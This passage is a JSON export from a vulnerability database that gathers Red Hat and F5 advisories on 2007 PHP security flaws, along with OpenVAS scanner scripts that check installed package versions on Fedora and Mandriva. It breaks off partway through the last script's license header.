{"redhat": [{"lastseen": "2018-12-11T17:44:40", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285) \r\n\r\nA flaw was found in the way PHP's unserialize() function processed data. If\r\na remote attacker was able to pass arbitrary data to PHP's unserialize()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1286)\r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker was able to pass arbitrary data to PHP's session_decode()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1711)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T12:19:55", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0155", "href": "https://access.redhat.com/errata/RHSA-2007:0155", "type": "redhat", "title": "(RHSA-2007:0155) Important: php security update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-12-11T17:44:13", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary strings using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2018-05-03T23:41:46", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0162", "href": "https://access.redhat.com/errata/RHSA-2007:0162", "type": "redhat", "title": "(RHSA-2007:0162) Moderate: php security update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-12-11T17:45:19", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T12:17:01", "published": "2007-04-20T04:00:00", "id": "RHSA-2007:0153", "href": "https://access.redhat.com/errata/RHSA-2007:0153", "type": "redhat", "title": "(RHSA-2007:0153) Moderate: php security update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-12-11T17:43:32", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way PHP's unserialize() function processes data. If\r\na remote attacker is able to pass arbitrary data to PHP's unserialize()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1286)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker is able to pass arbitrary data to PHP's session_decode()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1711)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2018-03-14T19:27:09", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0154", "href": "https://access.redhat.com/errata/RHSA-2007:0154", "type": "redhat", "title": "(RHSA-2007:0154) Important: php security update", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2017-06-08T00:16:05", "bulletinFamily": "software", "description": "", "modified": "2016-07-25T19:54:00", "published": "2007-09-17T04:00:00", "href": "https://support.f5.com/csp/article/K7859", "id": "F5:K7859", "title": "Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2016-11-09T00:09:33", "bulletinFamily": "software", "description": "PHP has been cited with multiple vulnerabilities. For information about these vulnerabilities, refer to the National Vulnerabilities Database.\n\nInformation about these advisories is available at the following locations:\n\n * (CVE-2007-1846) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1846> \nSQL injection vulnerability in index.php in the MyAds 2.04jp and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands using the cid parameter.\n\n * (CVE-2007-2509) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2509> \nCRLF injection vulnerability in the ftp_putcmd function in PHP before 4.4.7, and 5.x before 5.2.2 allows remote attackers to inject arbitrary FTP commands using CRLF sequences in the parameters to earlier FTP commands.\n\n * (CVE-2007-1285) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1285> \nA denial of service flaw was found in the way PHP processed a deeply nested array. A remote attacker could cause the PHP interpreter to crash by submitting an input variable with a deeply nested array.\n\n * (CVE-2007-1286) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1286> \nA flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass arbitrary data to PHP's unserialize() function, they could possibly execute arbitrary code as the apache user.\n\n * (CVE-2007-1583) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1583> \nA flaw was found in the way the mbstring extension set global variables. A script that used the mb_parse_str() function to set global variables could be forced to enable the register_globals configuration option, possibly resulting in global variable injection.\n\n * (CVE-2007-1711) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1711> \nA double free flaw was found in PHP's session_decode() function. If a remote attacker was able to pass arbitrary data to PHP's session_decode() function, they could possibly execute arbitrary code as the apache user.\n\n * (CVE-2007-1718) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1718> \nA flaw was discovered in the way PHP's mail() function processed header data. If a script sent mail using a subject header containing a string from an untrusted source, a remote attacker could send bulk email to unintended recipients.\n\n * (CVE-2007-1001) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1001> \nA heap based buffer overflow flaw was discovered in PHP's gd extension. A script that could be forced to process WBMP images from an untrusted source could result in arbitrary code execution.\n\n * (CVE-2007-0455) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0455> \nA buffer over-read flaw was discovered in PHP's gd extension. A script that could be forced to write arbitrary string using a JIS font from an untrusted source could cause the PHP interpreter to crash.\n\nF5 Product Development tracked this issue as CR79338 and CR77989 and it was fixed in BIG-IP 9.3.1 and 9.4.1. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>), [GTM](<https://support.f5.com/content/kb/en-us/products/big-ip_gtm.html>), [ASM](<https://support.f5.com/content/kb/en-us/products/big-ip_asm.html>), [Link Controller](<https://support.f5.com/content/kb/en-us/products/lc_9_x.html>), or [WebAccelerator](<https://support.f5.com/content/kb/en-us/products/wa.html>) release notes.\n\nAdditionally, this issue was fixed in Hotfix-BIG-IP-9.3.0-HF3 issued for BIG-IP 9.3.0. You may download this hotfix or later versions of the cumulative hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nF5 Product Development tracked this issue as CR86810 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/content/kb/en-us/products/firepass.html>) release notes.\n\nAdditionally, this issue was fixed in hotfix HF-602-2 issued for FirePass 6.0.2, hotfix HF-601-9 issued for FirePass 6.0.1, and hotfix HF-552-11 issued for FirePass 5.5.2. You may download these hotfixes or later versions of the cumulative hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\n**Note:** FirePass will silently close invalid connections. This behavior may cause some security scan devices to interpet the silent closure as the FirePass being vulnerable and to report a false positive.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy. \n \nFor information about managing F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n", "modified": "2016-07-25T00:00:00", "published": "2007-09-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/7000/800/sol7859.html", "id": "SOL7859", "title": "SOL7859 - Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-25T10:56:17", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861368", "id": "OPENVAS:861368", "title": "Fedora Update for php FEDORA-2007-415", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-415\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora Core 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00044.html\");\n script_id(861368);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"FEDORA\", value: \"2007-415\");\n script_cve_id(\"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1001\", \"CVE-2007-0455\");\n script_name( \"Fedora Update for php FEDORA-2007-415\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-common\", rpm:\"x86_64/php-common~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-cli\", rpm:\"x86_64/php-cli~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", rpm:\"x86_64/php-xmlrpc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-common\", rpm:\"i386/php-common~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-cli\", rpm:\"i386/php-cli~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-04-09T11:38:59", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830059", "id": "OPENVAS:1361412562310830059", "title": "Mandriva Update for php MDKSA-2007:089 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:089 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP intrerpreter to creash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n A buffer overflow in the sqlite_decode_function() in the bundled\n sqlite library could allow context-dependent attackers to execute\n arbitrary code (CVE-2007-1887).\n \n Updated packages have been patched to correct these issues. Also note\n that the default use of the Hardened PHP patch helped to protect\n against some of these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00025.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830059\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:089\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1887\");\n script_name( \"Mandriva Update for php MDKSA-2007:089 (php)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.2mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-24T12:56:11", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830059", "id": "OPENVAS:830059", "title": "Mandriva Update for php MDKSA-2007:089 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:089 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 